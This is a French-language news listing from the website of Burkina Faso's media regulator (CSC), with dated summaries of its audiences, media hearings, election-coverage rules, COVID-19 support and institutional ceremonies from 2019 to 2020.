Flash infos


DECISION N°2020- 026/CSC portant réglementation de la couverture médiatique des activités politiques durant la période du 1er octobre 2020 à 00 heure au 30 octobre 2020 à vingt-quatre (24) heures inclus

01/09/2020

DECISION N°2020- 026 /CSC portant réglementation de la couverture médiatique des activités politiques durant la période du 1er octobre 2020 à 00 heure au 30 octobre 2020 à vingt-quatre (24) heures inclus

Audience : la Coordonnatrice du SIG chez le président TANKOANO

25/08/2020

Le président du Conseil supérieur de la communication (CSC), Maître Soahanla Mathias TANKOANO, a reçu, en cette matinée du 25 août 2020, la Coordonnatrice du Service d'information du gouvernement (SIG), Mafarma SANOGO. Le président avait à ses côtés le Directeur de cabinet, Boureima DIALLO, et la Chargée d'études, Pauline KANTIONO. La Coordonnatrice était accompagnée de Paul NAGALO, Chef du département communication internationale du SIG.

Le cadre de dialogue inter-partis (CDIP) reçu en audience par le Président du Conseil supérieur de la communication

20/08/2020

Une délégation du Secrétariat exécutif du CDIP a été reçue en audience à sa demande par le Président du CSC, Maître Soahanla Mathias Tankoano, entouré de ses collaborateurs, le mercredi 19 août 2020.

Renforcement des capacités des journalistes et animateurs sur la gestion des émissions d’expression directe - Étape de Bobo-Dioulasso – Fin de formation

14/08/2020

Le séminaire atelier sur le renforcement des capacités des journalistes et animateurs des émissions d'expression directe (EED) dans un contexte de tension inter-communautaire s'est achevé le 11 août 2020 à l'hôtel Sissiman de Bobo-Dioulasso. Il a regroupé les journalistes et animateurs des EED du ressort de la Délégation régionale de l'Ouest (DRO) du Conseil supérieur de la communication (CSC) que sont la Boucle du Mouhoun, les Cascades, le Sud-Ouest et les Hauts-Bassins.

Le président du CES chez son homologue du CSC

03/08/2020

Le président du Conseil économique et social (CES), Pasteur Moïse NAPON, était dans les murs du Conseil supérieur de la communication (CSC) en fin de matinée de ce 03 août. Il a été accueilli par le Directeur de cabinet, Boureima DIALLO, le président Mathias TANKOANO étant en salle du Conseil pour une session ordinaire.

Le personnel témoigne sa compassion au président et à ses compagnons d’infortune

03/08/2020

Ce premier lundi du mois d'août devrait avoir lieu la traditionnelle montée des couleurs au Conseil supérieur de la communication (CSC). Le personnel avait voulu également saisir l'occasion pour témoigner sa compassion au président du CSC, Maître Soahanla Mathias TANKOANO, et à ses compagnons d'infortune qui ont été victimes d'une attaque terroriste le 12 juillet dernier. Même si la montée des couleurs n'a pas pu s'effectuer pour cause de pluie, le personnel s'est retrouvé dans le hall d'accueil de l'institution pour livrer le message au président.

Pré-campagne des élections 2020 : le CSC donne les consignes, conformément à la loi

30/07/2020

Le Conseil supérieur de la communication (CSC) a rencontré, ce mercredi 29 juillet 2020, des représentants de partis politiques et de regroupements de partis politiques. Le but de la rencontre dirigée par le président du CSC, Me Mathias TANKOANO, était de leur présenter la décision portant réglementation de la couverture médiatique des activités politiques durant la période du 3 août au 30 octobre 2020 communément appelée pré-campagne.

Audience : le CSC reçoit l’Association de développement des médias

28/07/2020

Le Directeur de cabinet du président du Conseil supérieur de la communication (CSC), Boureima DIALLO, représentant le président du CSC, a reçu en audience ce jour 28 juillet 2020, une délégation de l'Association de développement des médias (ADM) conduite par Wendpanga Daniel OUEDRAOGO, Chargé de communication de l'association, et Judicaël DOULKOM, Chargé de l'étude des audiences.

Stratégie globale de gestion du discours politique dans le cadre des élections présidentielle et législatives 2020 (SGE2020) : le CSC était sur le terrain !

20/07/2020

Le président du Conseil supérieur de la communication (CSC), Maître Mathias TANKOANO, a présidé le lancement des activités de la Stratégie globale de gestion du discours dans le cadre des élections présidentielle et législatives 2020 (SGE 2020), le mardi 07 juillet 2020, dans la salle de conférences de Royal Beach Hôtel de Ouagadougou.

Montée des couleurs au CSC : les femmes en uniforme pour remercier le président

06/07/2020

Pour la deuxième fois après le retour à la traditionnelle montée des couleurs interrompue par la pandémie de la COVID-19, les agents du Conseil supérieur de la communication (CSC) étaient sous le drapeau ce lundi 06 juillet 2020.

Le président du CSC reçoit l’opposition politique non affiliée

02/07/2020

Le président du Conseil supérieur de la communication (CSC), Maître Soahanla Mathias TANKOANO, a reçu en audience, le jeudi 02 juillet 2020, l'opposition politique non affiliée (ONA) représentée par son coordonnateur, le Pr Abdoulaye SOMA, monsieur Hermann YELKOUNI, représentant l'Alternative patriotique panafricaine/Burkindi (APP/Burkindi) et monsieur Akim HEMA.

Elections couplées 2020 : le CSC mène la concertation avec les médias publics

18/06/2020

Dans le cadre des préparatifs de la couverture médiatique des élections couplées présidentielle et législatives du 22 novembre 2020, le Conseil supérieur de la communication (CSC) mène des concertations avec les différents acteurs afin de réussir sa mission. Ce 18 juin 2020, c'était le tour des organes audiovisuels publics (RTB radio et télé et Radio rurale) d'avoir une séance de travail avec des représentants du CSC.

Fiscalité adaptée aux entreprises de presse et de publicité : rencontre de concertation avec la DGI sous la houlette du CSC

17/06/2020

Afin de renforcer les acquis engrangés après l'atelier national sur la fiscalité applicable aux médias tenu le 31 janvier 2019, le Conseil supérieur de la communication (CSC) a initié, ce mercredi 17 juin 2020, une rencontre de concertation avec la Direction générale des impôts (DGI). Cette rencontre avait pour objectif de donner l'occasion aux entreprises de presse et de publicité de faire entendre leur plaidoyer.

Application de la signalétique : le CSC forme les membres des comités de visionnage des télévisions

12/06/2020

Le Conseil supérieur de la communication (CSC) a organisé, à l'intention des comités de visionnage des médias télévisuels, un atelier de réflexion sur le thème : « protection des mineurs contre les contenus télévisuels nuisibles à leur épanouissement, rôle du régulateur, des médias et des parents ». Il s'est agi pour l'instance de régulation des médias de créer un cadre d'interaction entre elle et les médias télévisuels, afin de définir les mécanismes les mieux adaptés pour la programmation des productions destinées à la diffusion publique tout en n'omettant pas d'appliquer la décision sur la signalétique.

Le nouveau Directeur du Contrôle des Marchés publics et des Engagements financiers du CSC installé

08/06/2020

Le Conseil supérieur de la communication (CSC) a un nouveau contrôleur financier. Nommé en Conseil des ministres le 6 mai 2020, monsieur MILLOGO Diby Sourou Frédéric Eugène Camille Dimitri, a été installé dans ses fonctions de Directeur du Contrôle des Marchés publics et des Engagements financiers (DCMEF) du CSC ce lundi 8 juin 2020.

CSC/Ambassade de la RPC : une prise de contact qui augure d’une collaboration fructueuse

04/06/2020

Le président du Conseil supérieur de la communication (CSC), Me S. Mathias TANKOANO, a rendu, ce jeudi 04 juin 2020, en fin de matinée, une visite de courtoisie à l'Ambassadeur de la République populaire de Chine (RPC), M. Jian LI.  Pour cette visite de prise de contact, Me TANKOANO était accompagné de son Directeur de cabinet, M. Boureima DIALLO, et de la Secrétaire générale de l'institution, Mme M. Yvette NACOULMA/SANOU. L'ambassadeur chinois avait à ses côtés M. Bowei WANG, l'Attaché d'ambassade.

1er juin 2020 : la reprise de la montée des couleurs au Conseil supérieur de la communication (CSC) dans un contexte de COVID-19

01/06/2020

Après une interruption de deux mois, le Conseil supérieur de la communication a repris, ce lundi 1er juin 2020, la traditionnelle montée des couleurs. Depuis le mois d'avril, la cérémonie de montée des couleurs a été suspendue dans tous les ministères et institutions du Burkina Faso, du fait de la maladie à coronavirus.

Elections présidentielle et législatives couplées 2020 : le CSC élabore l’avant-projet du Pacte de bonne conduite

20/05/2020

Le Conseil supérieur de la communication (CSC) a tenu, le mercredi 20 mai 2020 dans sa salle de conférences, un atelier en vue d'élaborer et de valider un avant-projet de Pacte de bonne conduite des acteurs des élections présidentielle et législatives couplées de novembre 2020.

Le CSC auditionne la télévision BF1

11/05/2020

La Commission en charge de la Liberté de la Presse, du Pluralisme, de l'Ethique et de la Déontologie du Conseil supérieur de la Communication (CSC) a entendu les responsables de la télévision BF1 le 7 mai 2020. L'audition fait suite à la diffusion de deux reportages contenant des insuffisances professionnelles.

Lutte contre le COVID-19 : le CSC apporte son soutien aux médias

08/05/2020

Le Conseil supérieur de la communication (CSC) a procédé à une remise de matériels aux médias et au monde de la publicité afin de les appuyer dans le cadre de la lutte contre la propagation du COVID-19. La cérémonie s'est déroulée le vendredi 8 mai 2020 au siège de l'instance de régulation des médias, sous la présidence de Maître Soahanla Mathias Tankoano, Président du CSC.

Coronathon: : Le CSC contribue à la Lutte contre le COVID-19

08/05/2020

Une délégation du Conseil supérieur de la communication (CSC) conduite par le Vice-président, AbdoulAzize BAMOGO, s'est rendue, ce vendredi 08 mai 2020, au siège du Coronathon pour donner sa contribution.

Lutte contre la COVID-19 : les présidents d’institutions s’engagent !

30/04/2020

Le jeudi 30 avril 2020, une délégation des présidents d'institutions du Burkina s'est rendue au Ministère de la santé pour apporter son soutien au gouvernement dans le cadre de la lutte contre le COVID-19. Me Mathias TANKOANO, président du Conseil supérieur de la communication, s'est joint à la délégation pour la remise de don.

Le CSC a entendu le Directeur de Publication de « Radars Info Burkina »

30/04/2020

La Commission en charge de la Liberté de la Presse, du Pluralisme, de l'Ethique et de la Déontologie du Conseil supérieur de la communication (CSC) a entendu, le 28 avril 2020, au sein de l'institution, le Directeur de Publication du média en ligne « Radars Info Burkina ». 

Le CSC et le MENAPLN portent sur les fonts baptismaux la Radio scolaire

23/04/2020

Ce 23 avril 2020 a eu lieu, dans la salle du conseil du Conseil supérieur de la communication (CSC), la signature d'une convention de concession de service public de radiodiffusion sonore entre le Conseil supérieur de la communication (CSC) et le ministère de l'Education nationale, de l'Alphabétisation et de la Promotion des Langues nationales (MENAPLN). Cette convention permet au MENAPLN d'exploiter la fréquence 107.4 MHz pour maintenir les élèves et les enseignants dans l'activité d'apprentissage et de formation.

La Fondation Abdallah Ben Mass-Houd offre des kits de protection contre le Covid-19 aux médias nationaux

23/04/2020

La Fondation Abdallah Ben Mass-Houd a fait un don de matériel de protection contre le Covid-19 aux médias nationaux, ce jeudi 23 avril 2020. La salle du conseil du Conseil supérieur de la communication (CSC) a abrité la cérémonie. C'est le Secrétaire général de la Fondation, Saïdou DIALLO, assurant l'intérim de la présidence, qui a remis le lot au président du CSC, Me Mathias TANKOANO. Me TANKOANO a, séance tenante, remis le don au représentant des faîtières des professionnels des médias, Charlemagne ABISSI, président de l'Union nationale libre du Faso (UNALFA).

Le Président du CSC a reçu en audience la Commission ad hoc du Haut conseil de la recherche et de l’innovation

15/04/2020

Une délégation de la Commission ad hoc du Haut conseil de la recherche et de l'innovation a été reçue par le Président du Conseil supérieur de la communication, Maître Soahanla Mathias Tankoano, le mercredi 15 avril 2020.  

Le CERFI reçu en audience par le Président du CSC

14/04/2020

Le Président du Conseil supérieur de la communication ( CSC), Maître Soahanla Mathias Tankoano, a reçu en audience, le mardi 14 avril 2020, une délégation du Cercle d'études, de recherche et de formation islamique (CERFI), à la demande de celui-ci.

Décès de Moustapha Thiombiano : les condoléances du président du CSC

08/04/2020

C'est avec une grande tristesse que j'ai appris le décès, ce 06 avril 2020, de Monsieur Moustapha Laabli Thiombiano, PDG du Groupe Horizon FM/TVZ Africa.

Message du Président du Conseil supérieur de la communication dans la lutte contre le Covid-19

26/03/2020

Chers partenaires des médias, des associations professionnelles de médias et du monde de la publicité, la pandémie du Coronavirus, Covid-19, est une réalité. Vous en êtes mieux informés, du fait de votre profession. Je voudrais saluer les efforts des médias qui mènent déjà des actions pour accompagner les autorités nationales dans la lutte contre le Covid-19.

AUDITION : L’Express du Faso entendu par le CSC

23/03/2020

La Commission chargée de la liberté de la presse, de l'éthique et de la déontologie du Conseil supérieur de la communication (CSC) a auditionné, le vendredi 20 mars 2020, le Directeur de publication du journal « L'Express du Faso », monsieur Mountamou KANI. 

Publicités des produits de la pharmacopée traditionnelle et des établissements sanitaires : Le CSC sensibilise les médias

20/03/2020

Ce jeudi 19 mars 2020, le Conseil supérieur de la communication (CSC) a tenu une rencontre d'échanges avec des représentants de médias audiovisuels et de la presse écrite. Cette rencontre a été initiée suite au constat, par l'organe de régulation, de la persistance de diffusion des messages publicitaires concernant des produits de la pharmacopée traditionnelle et des établissements sanitaires. 

AUDITION DE RADIO OMEGA FM

16/03/2020

La Commission chargée de la liberté de la presse, de l'éthique et de la déontologie du Conseil supérieur de la communication (CSC) a reçu en audition, le vendredi 13 mars 2020, la radio Oméga FM, représentée par monsieur SANOU Hyacinthe, Directeur de la rédaction. Cette audition fait suite à la diffusion sur les ondes de la radio d'informations sur la tuerie à Barga et qui désignent sans réserve les koglweogo comme auteurs de ce drame.

Coopération internationale Le conseiller Wang Bowei de l’ambassade de la république de Chine au Burkina Faso a rendu visite au Président du CSC Maître Soahanla Mathias Tankoano

13/03/2020

Coopération internationale Le conseiller Wang Bowei de l'ambassade de la république de Chine au Burkina Faso a rendu visite au Président du CSC Maître Soahanla Mathias Tankoano Le Président du Conseil supérieur de la communication, Maître Soahanla Mathias Tankoano a reçu en audience monsieur Wang Bowei, conseiller à l'ambassade de la république de Chine au Burkina Faso, le vendredi 13 mars 2020.

Audience : Le président du CSC reçoit une délégation de la radio BBC

13/03/2020

Le président du Conseil supérieur de la communication (CSC), Mathias TANKOANO, a accordé une audience à la chaine internationale BBC ce jeudi 12 mars 2020. Les représentantes de BBC ont abordé avec lui leur projet pour la jeunesse africaine à travers des productions de télévision et radio ainsi que la question de leurs redevances.

Vœux du CSC au monde de la communication et des médias : tous ensemble pour relever les défis

11/02/2020

Le Collège des Conseillers du Conseil supérieur de la communication (CSC) a organisé une cérémonie de présentation de vœux du Nouvel An aux responsables des agences de communication, des médias et des organisations professionnelles des médias. C'était le vendredi 07 février 2020 dans la cour de l'institution. 

Une équipe de Target Malaria Burkina Faso au CSC

16/01/2020

Une équipe du consortium de recherche Target Malaria du Burkina Faso, composée de Léa PARE et de David LOMPO, tous deux chercheurs à l'Institut de recherche en sciences de la santé (IRSS) du Centre national de la recherche scientifique et technologique (CNRST) du Burkina Faso, était en visite en fin de matinée de ce 16 janvier 2020 au Conseil supérieur de la communication (CSC). L'équipe a été reçue par le Vice-président, assurant l'intérim du Président du CSC, Abdoulazize BAMOGO, auquel s'est adjoint le Directeur de la communication et des relations publiques assurant l'intérim du Directeur de cabinet, Hamidou IDOGO.

Vandalisme chez Yacouba Ladji BAMA : une délégation du CSC chez le journaliste

08/01/2020

Ce mercredi 08 janvier 2020, une délégation du Conseil supérieur de la communication (CSC) est allée témoigner la compassion de l'institution et apporter son soutien au journaliste Yacouba Ladji BAMA, victime de la vandalisation de son véhicule dans la nuit du 06 au 07 janvier 2020, à son domicile sis à Toéyibin à Ouagadougou.

Montée du drapeau en guise de vœux du Nouvel An au CSC

06/01/2020

Le personnel du Conseil supérieur de la communication (CSC) a sacrifié à la tradition. En effet, ce 06 avril, premier lundi de l'année 2020, le président de l'institution, les Conseillers, le Directeur de cabinet, la Secrétaire générale, les Chargés de missions, les Chargés d'études, les Directeurs, chefs de services et l'ensemble du personnel du cabinet et du secrétariat général ont procédé à la montée des couleurs nationales, pour honorer cet acte à la citoyenneté enclenché depuis l'année dernière.

Monitoring des médias : lancement officiel des activités d’un nouveau système au CSC

30/12/2019

Le Conseil supérieur de la communication (CSC) a organisé, le vendredi 27 décembre 2019 dans son enceinte, une cérémonie de lancement officiel de son nouveau système de monitoring dénommé HACA Média Solution (HMS).

Remise des rapports publics 2016-2017 et 2018 du Conseil supérieur de la communication au Président du Faso

30/12/2019

Une délégation du Conseil supérieur de la communication (CSC), conduite par son Président, Maître Soahanla Mathias TANKOANO, a remis au Président du Faso Roch Marc Christian KABORE, les rapports publics 2016-2017 et 2018 de l'instance de régulation des médias, le vendredi 27 décembre 2019. Faisait partie de la délégation, les membres du collège des conseillers, ainsi qu'une partie du personnel administratif de l'institution.

Fête de la Nativité : la mutuelle des travailleurs du CSC offre un arbre de Noël aux enfants du personnel

24/12/2019

La mutuelle des travailleurs du Conseil supérieur de la communication (CSC), avec l'appui du Président, a organisé une cérémonie d'arbre de Noël pour souhaiter un Joyeux Noël aux enfants du personnel. Ce lundi 23 décembre 2019, ils étaient plus d'une cinquantaine à avoir reçu chacun un cadeau du Père Noël.

Cérémonie de décorations : Le CSC distingue 19 agents du monde des médias et de la communication

20/12/2019

Le Conseil supérieur de la communication (CSC) a honoré, le jeudi 19 décembre 2019 dernier dans son enceinte, dix-neuf (19) agents et personnalités provenant d'organes de presse, d'organisations professionnelles des médias et de la communication. Ces distinctions honorifiques ont été décernées dans l'Ordre du Mérite burkinabè et de l'Ordre du Mérite des Arts, des Lettre et de la Communication. Ces décorations entrent dans le cadre de la célébration  du 11 décembre 2019.

Le président du CSC a patronné le lancement du projet « MédiaSahel »

17/12/2019

Le Président du Conseil supérieur de la communication (CSC), Me Soahanla Mathias TANKOANO, a patronné, le mardi 17 décembre 2019, le lancement de l'atelier de concertation sur le projet « MédiaSahel ». Les travaux se dérouleront à l'hôtel Pacific de Ouagadougou pendant trois (03) jours.

Le CSC signe une convention avec l’association des radios catholiques

05/12/2019

Le Conseil supérieur de la communication (CSC) et l'Association des radios catholiques du Burkina (ARCB) ont procédé, le jeudi 05 décembre 2019, à la signature d'une convention. Cette convention les lie pour les dix (10) prochaines années.

L’agent comptable du CSC a prêté serment

03/12/2019

Le mardi 03 décembre 2019, a eu lieu, à la Cour de cassation de Ouagadougou, la cérémonie de prestation de serment de 24 agents comptables publics nommés par le Président du Faso. Parmi ces agents, Monsieur Tiraogo YIOUGOU a été mis à la disposition du Conseil supérieur de la communication (CSC).

Le CSC a perdu son Représentant provincial de Tenkodogo

28/11/2019

Maurice KIMA, Représentant provincial du Conseil supérieur de la communication (CSC)/Tenkodogo est décédé le 20 octobre 2019 au Centre médical Paul VI de Ouagadougou.

Le président du CSC reçoit une visite de courtoisie de la HAAC/Togo et de la HAC/Mali

26/11/2019

Présents à Ouagadougou dans le cadre des Universités africaines de la communication (UACO), le président de la Haute autorité de l'audiovisuel et de la communication (HAAC) du Togo, Willibronde P. TÉLOU, et Mahamane Hamèye CISSÉ, président de la Commission média et Tic de la Haute autorité de l'audiovisuel (HAC) du Mali, ont rendu une visite de courtoisie au président du Conseil supérieur de la communication (CSC), Me Mathias S. TANKOANO. Le président TANKOANO avait à ses côtés les conseillers Séraphine Eugénie YAMEOGO/OUATTARA et Séni DABO.

Rencontre de prise de contact avec les représentants provinciaux du Conseil supérieur de la communication

08/11/2019

Le Collège des Conseillers a eu, le jeudi 7 novembre 2019, une rencontre de prise de contact et d'échanges avec les représentants provinciaux du Conseil supérieur de la communication (CSC). En l'absence du président, le Conseiller Alexis KONKOBO a conduit les échanges.

Fin de la visite de la mission du CSC Niger : échanges d’expériences enrichissants

07/11/2019

Débutée le lundi dernier, la mission d'échanges d'expériences du Conseil supérieur de la communication (CSC) de la République du Niger auprès de son homologue du Burkina Faso a pris fin le 06 novembre 2019.

Audience : Me TANKOANO reçoit une délégation de l’UCAO

05/11/2019

Le président du Conseil supérieur de la communication (CSC), Me Mathias S. TANKOANO, a reçu en audience, ce 04 novembre 2019, une délégation des étudiants de l'Unité universitaire de Bobo-Dioulasso de l'Université catholique de l'Afrique de l'Ouest (UCAO).

Coopération : une délégation du CSC du Niger au CSC du Burkina

04/11/2019

Une délégation du Conseil supérieur de la communication (CSC) de la République du Niger, est en visite d'échange d'expériences avec son homologue du Burkina Faso. Conduite par Mme Hadiza Khalifa, Rapporteur, elle est composée de M. Kadri Hamadou, Conseiller, et de Mme Biba Boureima, Chef du service du personnel.

Rencontre entre le CSC et les éditeurs de presse : échanges sur le passage au numérique.

23/10/2019

Ce mardi 22 octobre 2019 a eu lieu, dans la salle de conférences du Conseil supérieur de la communication (CSC), une rencontre entre les différents acteurs de la transition vers la télévision numérique terrestre (TNT) et les éditeurs de services privés, surtout ceux de la télévision. Cette rencontre avait principalement pour objet de discuter de l'extinction du signal analogique et du passage pratique à la TNT à compter du 1er novembre 2019.

Installation d’un agent comptable au CSC : une première pour l’institution

21/10/2019

Ce vendredi 18 octobre 2019, le Conseil supérieur de la communication (CSC) a accueilli un agent comptable. Il s'agit du tout premier pour l'institution. Il se nomme Monsieur Tiraogo YIOUGOU, Inspecteur du Trésor, nommé suivant Décret N° 2019-0500/PRES/PM/MINEFID du 22 mai 2019. La cérémonie, présidée par Monsieur le Conseiller Alexis KONKOBO, représentant le Président du CSC, a eu lieu en présence de la Secrétaire générale, Madame Massadalo Yvette NACOULMA/SANOU, de Monsieur et Madame les Conseillers Victor SANOU et Séraphine YAMEOGO/OUATTARA, des directeurs et chefs de service et des collègues, parents et amis du promu.

Voyages de partage d’expériences dans les pays utilisant le système de monitoring HMS de la HACA-Maroc : l’étape de Bamako

18/10/2019

Dans le cadre de l'acquisition par le Conseil supérieur de la communication (CSC) d'un système de monitoring performant, des missions d'échanges ont été dépêchées dans les pays de la sous-région utilisant le système de monitoring Haca Médias Solution (HMS) de la Haute autorité de la communication audiovisuelle (HACA) du Maroc. La première mission a séjourné à Conakry en République de Guinée du 23 au 28 septembre 2019. A sa suite, une deuxième équipe s'est rendue auprès de la Haute autorité de la communication (HAC) du Mali. La mission a séjourné à Bamako du 04 au 12 octobre 2019.

Audience : le Représentant-résident du PNUD chez le président TANKOANO

17/10/2019

Le président du Conseil supérieur de la communication (CSC), Me S. Mathias TANKOANO, a reçu, en fin de matinée de ce 17 octobre, le représentant-résident du Programme des Nations unies pour le développement (PNUD), Monsieur Mathieu CIOWELA.

COMMUNIQUE RELATIF A LA SAISINE DU CSC PAR LE SYNATIC

16/10/2019

Suite à sa saisine en date du 16 septembre 2019 par le Syndicat Autonome des Travailleurs de l'Information et de la Communication (SYNATIC) dénonçant un acte de « piratage » sur la fréquence de la RTB/télé le 14 septembre 2019, le Conseil supérieur de la communication (CSC) a entrepris une série d'auditions avec l'ensemble des acteurs concernés en vue d'élucider les faits à lui rapportés.

20 ans de Savane FM : Me Mathias TANKOANO préside la cérémonie d’ouverture des festivités

11/10/2019

Le président du Conseil supérieur de la communication (CSC), Me Mathias TANKOANO, a présidé, le vendredi 11 octobre 2019, la cérémonie officielle marquant les 20 ans de la naissance de la radio Savane FM. A cette occasion, il a procédé au lancement officiel des activités de la télévision Savane TV. 1999-2019, voilà 20 ans que la radio Savane FM a vu le jour.

Rencontre CSC-Editeurs de services : les « Télénovelas » au cœur des échanges

27/09/2019

Le Conseil supérieur de la communication (CSC) a, le vendredi 27 septembre 2019, eu une rencontre d'échanges avec les responsables des télévisions publiques, privées et Canal+Burkina sur le contenu de leurs programmes servis au public. Il s'agissait pour l'instance de régulation d'interpeller les chaînes de télévision sur la problématique des séries brésiliennes dites « Télénovelas » et les inviter à réfléchir sur les mesures à prendre pour atténuer leurs effets néfastes sur le public jeune.

Rencontre CSC-Union africaine: le processus électoral au cœur des échanges

19/09/2019

Le président du Conseil supérieur de la communication (CSC), Me Soahanla Mathias TANKOANO, a, le mercredi 18 septembre 2019, reçu une délégation de l'Union africaine (UA) et de l'Institut international pour la démocratie et l'assistance (IDEA International). La délégation, conduite par Minata SAMATE/CESSOUMA, Commissaire aux Affaires politiques de l'UA, est venue comprendre comment l'instance de régulation compte gérer la campagne électorale de l'élection présidentielle de 2020.

31 octobre 2019 à 23h59, fin de la diffusion analogique de la télévison

18/09/2019

Le président du Conseil supérieur de la communication (CSC), Me Mathias TANKOANO, a pris part, le mardi 17 septembre 2019, à la réunion du comité de pilotage de la Télévision numérique terrestre (TNT). Réuni sous la présidence du Premier ministre, Son Excellence Monsieur Christophe Marie Joseph DABIRE, il s'est agi pour le comité de préparer le passage de la télévision analogique à la télévision numérique de terre, le 1er novembre 2019.

Montée des couleurs: le personnel du CSC sacrifie à la tradition

02/09/2019

Le personnel du Conseil supérieur de la communication (CSC) a sacrifié, ce lundi 2 septembre 2019, à la traditionnelle montée des couleurs. Le président, Me Mathias TANKOANO et les Conseillers, les directeurs, les chefs de service et agents réunis sur le perron ont hissé le drapeau national en chantant haut le Ditanyè.

Le CSC a auditionné le site d’information « aouaga.com »

29/08/2019

La commission chargée de la liberté de la presse, de l'éthique et de la déontologie du Conseil supérieur de la communication (CSC), présidée par le Conseiller Jeanne COULIBALY, a procédé à l'audition de la représentante locale du  site d'information « aouaga.com », le mercredi 28 août 2019.

Audience : le groupe Savane Médias célèbre ses 20 ans d’existence et sollicite un accompagnement du CSC.

28/08/2019

Ce mercredi 28 août 2019, Me Soahanla Mathias TANKOANO, président du Conseil Supérieur de la Communication (CSC), a reçu en audience une délégation du groupe Savane Médias conduite par son Président Directeur Général, M. Aboubacar ZIDA dit Sidnaaba.Prenant la parole, le Directeur général de l'organe de presse, M. Charlemagne ABISSY, a situé l'objet de la visite qui est d'annoncer la célébration des vingt (20) ans d'existence de la Radio Savane FM. 

Communiqué: le CSC a auditionné Radio Liberté et le portail Netafrique.net

23/08/2019

La commission chargée de la liberté de la presse, de l'éthique et de la déontologie du Conseil supérieur de la communication (CSC), présidée par le conseiller madame Jeanne Coulibaly, assistée du conseiller monsieur Alexis Konkobo et d'agents de l'institution, a procédé aux auditions des responsables de « Radio Liberté » et du média en ligne « Netafrique.net », le vendredi 23 août 2019.

Audience: WILPF sollicite l’accompagnement du CSC pour promouvoir la paix et la civilité au Faso

23/08/2019

Le président du Conseil supérieur de la communication (CSC), Me Mathias TANKOANO, a reçu en audience, le jeudi 22 août 2019, une délégation de Women international league for peace and freedom group Burkina Faso (WILPF/Burkina Faso) conduite par sa présidente Régina OUATTARA.

Le CSC a renouvelé la convention de Radio Campus

21/08/2019

Le Président du Conseil supérieur de la communication (CSC), Maître Soahanla Mathias TANKOANO, et le Président de l'Université Joseph KI-ZERBO, Professeur Rabiou CISSE, ont procédé, ce mercredi 21 août 2019, au renouvellement de la convention entre le CSC et Radio Campus, émettant au 191.2.

Publicité sur les armes et munitions: les acteurs se concertent

14/08/2019

Ce mercredi 14 août 2019 s'est tenue au sein du Conseil supérieur de la communication (CSC), une rencontre d'échanges entre la Commission nationale de lutte contre la prolifération des armes légères, le ministère de la Sécurité, la commune de Ouagadougou et le CSC à propos de la publicité sur les armes à feu et les munitions.

Régulation de la publicité sur les établissements d’enseignement: le CSC veut accorder les violons avec les ministères de tutelle

08/08/2019

 Une rencontre d'échanges présidée par la secrétaire générale du Conseil supérieur de la communication (CSC), Madame Massadalo Yvette Nacoulma, a regroupé les services techniques de ladite instance de régulation des médias et un représentant du secrétaire général du ministère des Enseignements supérieurs, de la recherche scientifique et de l'innovation le mercredi 7 août 2019, au sein de l'institution.

La CIL sensibilise sur la protection des données personnelles

26/07/2019

Dans sa mission de veille au respect des droits des personnes en matière de protection des données à caractère personnel, la Commission de l'informatique et des libertés (CIL) organise des campagnes d'information-sensibilisation sur l'impérieuse nécessité des respecter ces droits. C'est dans ce cadre que, sous le patronage de madame le ministre des Droits humains et de la Promotion civique, elle a organisé, le 25 juillet 2019 dans la salle de conférences du Conseil burkinabè des chargeurs à Ouagadougou, un séminaire national de sensibilisation sur la protection des données à caractère personnel.

Obsèques de Monsieur Alain Marcel de SOUZA, ancien Président de la Commission de la CEDEAO Le Président du CSC signe le livre de condoléances ouvert au siège de la Commission à Ouagadougou.

24/07/2019

Maître Soahanla Mathias TANKOANO a effectué le déplacement de la Commission de la CEDEAO à Ouagadougou, le mercredi 24 juillet, pour signer le livre de condoléances ouvert dans le cadre des obsèques de Monsieur Alain Marcel de SOUZA, ancien Président de la Commission, décédé des suites d'une crise cardiaque le mercredi 17 juillet à Paris.

Droit d’auteur lors des campagnes électorales Rencontre d’échanges entre le CSC et le BBDA

24/07/2019

Le Président du Conseil supérieur de la communication, Maître Soahanla Mathias TANKOANO, a accordé une audience à une délégation du Bureau burkinabè des droits d'auteurs (BBDA), conduite par son Directeur général, monsieur Walib BARA, le mercredi 24 juillet 2019. Il s'est agi pour le BBDA de venir présenter au Président du CSC un projet relatif au respect des droits d'auteurs durant les campagnes électorales.

Riposte contre le terrorisme: médias et FDS ont posé des passerelles de dialogue

19/07/2019

L'atelier «Médias et sécurité», ouvert à Kaya, province du Sanmatenga, région du Centre-Nord, le 17 juillet 2019, s'est refermé le 19 juillet. Il a été tenu à l'initiative du Secrétariat général de la Défense nationale (SGDN) et du Conseil supérieur de la communication (CSC) et le soutien financier du Programme des nations unies pour le développement (PNUD).

Sortie de la 7e promotion de l’IRA de l’Est : Me Mathias TANKOANO choisi personnalité énarque

19/07/2019

Le président du Conseil supérieur de la communication (CSC ) a présidé, ce vendredi 19 juillet 2019, à Fada N'Gourma, la cérémonie de sortie de la 7e promotion des élèves de l'Institut régional d'administration (IRA) de l'Est. Ce, en qualité de "personnalité énarque 2019".

Vers une synergie d’actions Médias/FDS dans la lutte contre le terrorisme

17/07/2019

L'atelier de réflexion et de validation sur les passerelles de dialogue entre les Forces de défense et de sécurité (FDS) et les médias dans la politique de riposte contre le terrorisme s'est ouvert ce mercredi 17 juillet 2019 à Kaya, capitale de la province du Sanmatenga et de la Région du Centre-Nord.

Audience : le président du CSC reçoit une mission d’évaluation pré-électorale de l’ONU

26/06/2019

Le président du Conseil supérieur de la communication (CSC), Me S. Mathias TANKOANO, a reçu en audience, ce mercredi 26 juin 2019, une mission de l'Organisation des Nations Unies (ONU). Présente au Burkina Faso pour une évaluation du processus pré-électoral, cette mission, conduite par Akinyemi Adegbola, Coordonnateur de la division de l'assistance électorale au siège de l'ONU, est venue comprendre le rôle du CSC dans le processus électoral ainsi que les défis qui se présentent à lui.

Le CSC déroule sa feuille de route à Fada et s’outille pour atteindre ses objectifs

25/06/2019

Le Conseil supérieur de la communication (CSC) a tenu à Fada N'Gourma, Région de l'Est, les 20 et 21 juin derniers, un atelier de concertation sur sa feuille de route.

Audience : le président du CSC reçoit le Directeur de la chaine de télé MTA International

19/06/2019

Le Président du Conseil Supérieur de la Communication (CSC), Me Soahanla Mathias TANKOANO,  a reçu, dans la matinée du mercredi 19 juin 2019, la visite de courtoisie du Directeur des opérations satellites de la chaine de télé MTA International, Nasser Ahmed SYED.

Communiqué de presse: Le CSC interpelle les responsables de BF1 et Monsieur Issaka LlNGANI

13/06/2019

